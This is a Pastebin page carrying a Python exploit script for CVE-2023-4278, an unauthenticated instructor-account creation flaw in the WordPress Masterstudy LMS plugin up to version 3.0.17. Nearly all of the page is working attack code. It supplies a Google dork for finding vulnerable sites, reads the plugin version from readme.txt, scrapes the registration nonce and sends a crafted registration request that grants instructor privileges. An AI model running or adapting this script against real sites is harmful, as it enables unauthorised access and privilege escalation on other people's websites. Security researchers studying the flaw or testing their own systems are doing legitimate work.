FlyFar

Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation

Jan 20th, 2024
111
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.70 KB | Cybersecurity | 0 0
  1. # Exploit Title:  Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
  2. # Google Dork: inurl:/user-public-account
  3. # Date: 2023-09-04
  4. # Exploit Author: Revan Arifio
  5. # Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/
  6. # Version: <= 3.0.17
  7. # Tested on: Windows, Linux
  8. # CVE : CVE-2023-4278
  9.  
  10. import requests
  11. import os
  12. import re
  13. import time
  14.  
  15. banner = """
  16.   _______      ________    ___   ___ ___  ____        _  _ ___ ______ ___  
  17.  / ____\ \   / /  ____|  |__ \ / _ \__ \|___ \     | || |__ \____  / _ \
  18. | |     \ \ / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) |  / / (_) |
  19. | |      \ \/ / |  __|______/ /| | | |/ / |__ <______|__   _/ /  / / > _ <
  20. | |____   \ /  | |____    / /_| |_| / /_ ___) |        | |/ /_ / / | (_) |
  21.  \_____|   \/   |______|  |____|\___/____|____/         |_|____/_/   \___/
  22.                                                                            
  23. ======================================================================================================
  24. || Title            : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation       ||
  25. || Author           : https://github.com/revan-ar                                                   ||
  26. || Vendor Homepage  : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/      ||
  27. || Support          : https://www.buymeacoffee.com/revan.ar                                         ||
  28. ======================================================================================================
  29.  
  30. """
  31.  
  32.  
  33. print(banner)
  34.  
  35. # get nonce
  36. def get_nonce(target):
  37.     open_target = requests.get("{}/user-public-account".format(target))
  38.     search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)
  39.     if search_nonce[1] != None:
  40.         return search_nonce[1]
  41.     else:
  42.         print("Failed when getting Nonce :p")
  43.  
  44.  
  45.  
  46. # privielege escalation
  47. def privesc(target, nonce, username, password, email):
  48.  
  49.     req_data = {
  50.         "user_login":"{}".format(username),
  51.         "user_email":"{}".format(email),
  52.         "user_password":"{}".format(password),
  53.         "user_password_re":"{}".format(password),
  54.         "become_instructor":True,
  55.         "privacy_policy":True,
  56.         "degree":"",
  57.         "expertize":"",
  58.         "auditory":"",
  59.         "additional":[],
  60.         "additional_instructors":[],
  61.         "profile_default_fields_for_register":[],
  62.         "redirect_page":"{}/user-account/".format(target)
  63.         }
  64.  
  65.     start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)
  66.  
  67.     if start.status_code == 200:
  68.         print("[+] Exploit Success !!")
  69.     else:
  70.         print("[+] Exploit Failed :p")
  71.  
  72.  
  73.  
  74. # URL target
  75. target = input("[+] URL Target: ")
  76. print("[+] Starting Exploit")
  77. plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))
  78. plugin_version = re.search("Stable tag: (.+)", plugin_check.text)
  79. int_version = plugin_version[1].replace(".", "")
  80. time.sleep(1)
  81.  
  82. if int(int_version) < 3018:
  83.     print("[+] Target is Vulnerable !!")
  84.     # Credential
  85.     email =  input("[+] Email: ")
  86.     username =  input("[+] Username: ")
  87.     password =  input("[+] Password: ")
  88.     time.sleep(1)
  89.     print("[+] Getting Nonce...")
  90.     get_nonce = get_nonce(target)
  91.     # Get Nonce
  92.     if get_nonce != None:
  93.         print("[+] Success Getting Nonce: {}".format(get_nonce))
  94.         time.sleep(1)
  95.         # Start PrivEsc
  96.         privesc(target, get_nonce, username, password, email)
  97.     # ----------------------------------
  98.    
  99. else:
  100.     print("[+] Target is NOT Vulnerable :p")
  101.            
Add Comment
Please, Sign In to add comment